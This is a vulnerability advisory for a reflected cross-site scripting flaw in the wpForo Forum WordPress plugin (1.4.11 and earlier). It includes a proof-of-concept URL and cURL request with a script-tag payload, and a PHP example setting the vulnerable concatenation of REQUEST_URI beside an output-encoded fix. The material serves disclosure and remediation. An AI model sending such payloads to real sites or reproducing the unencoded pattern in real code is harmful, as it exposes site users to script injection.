Description
Versions 1.4.11 and below of the wpForo Forum WordPress plugin were found to be vulnerable to reflected Cross-Site Scripting (XSS). The plugin used the $_SERVER['REQUEST_URI'] PHP variable to build a URL string that was later output within HTML without any output encoding.
Proof of Concept
Click on the following link while using the Internet Explorer (IE) web browser, with the XSS filter disabled:
http://www.example.com/index.php/community/?%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
Alternatively, run the following cURL request and notice that the XSS payload is output within HTML without any validation or output encoding:
curl -s 'http://www.example.com/index.php/community/?"><script>alert(/XSS/)</script>' | grep "XSS"
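The pattern named in the Description, shown next to an output-encoded version. This is an added example, not wpForo's code: the function names and the link markup are hypothetical, and the request data is constructed to mirror the cURL request above.

```php
<?php
// Added illustration; not wpForo source. Function names are hypothetical.

// Constructed request data, mirroring the cURL proof of concept.
$server = [
    'HTTP_HOST'   => 'www.example.com',
    'REQUEST_URI' => '/index.php/community/?"><script>alert(/XSS/)</script>',
];

// Builds the current URL from request data. REQUEST_URI comes straight from
// the client's request line; PHP neither decodes nor sanitises it.
function current_url(array $server): string
{
    return 'http://' . $server['HTTP_HOST'] . $server['REQUEST_URI'];
}

// Vulnerable pattern: the raw URL string is concatenated into an HTML attribute.
function render_link_unsafe(array $server): string
{
    return '<a href="' . current_url($server) . '">Permalink</a>';
}

// Hardened: encode for the HTML attribute context at the point of output.
// Inside WordPress, esc_url() or esc_attr() are the idiomatic equivalents.
function render_link_safe(array $server): string
{
    $url = htmlspecialchars(
        current_url($server),
        ENT_QUOTES | ENT_SUBSTITUTE,
        'UTF-8'
    );
    return '<a href="' . $url . '">Permalink</a>';
}

$unsafe = render_link_unsafe($server);
$safe   = render_link_safe($server);

echo $unsafe, PHP_EOL;
echo $safe, PHP_EOL;

// In the unsafe output the double quote closes the href attribute, so the
// script tag is parsed as markup. In the safe output it stays attribute text.
var_dump(strpos($unsafe, '<script>') !== false);
var_dump(strpos($safe, '<script>') !== false);
```

Encoding belongs at the output site rather than where the URL is built, because the same string may later be written into a different context (attribute, JavaScript, redirect header) that needs a different encoder.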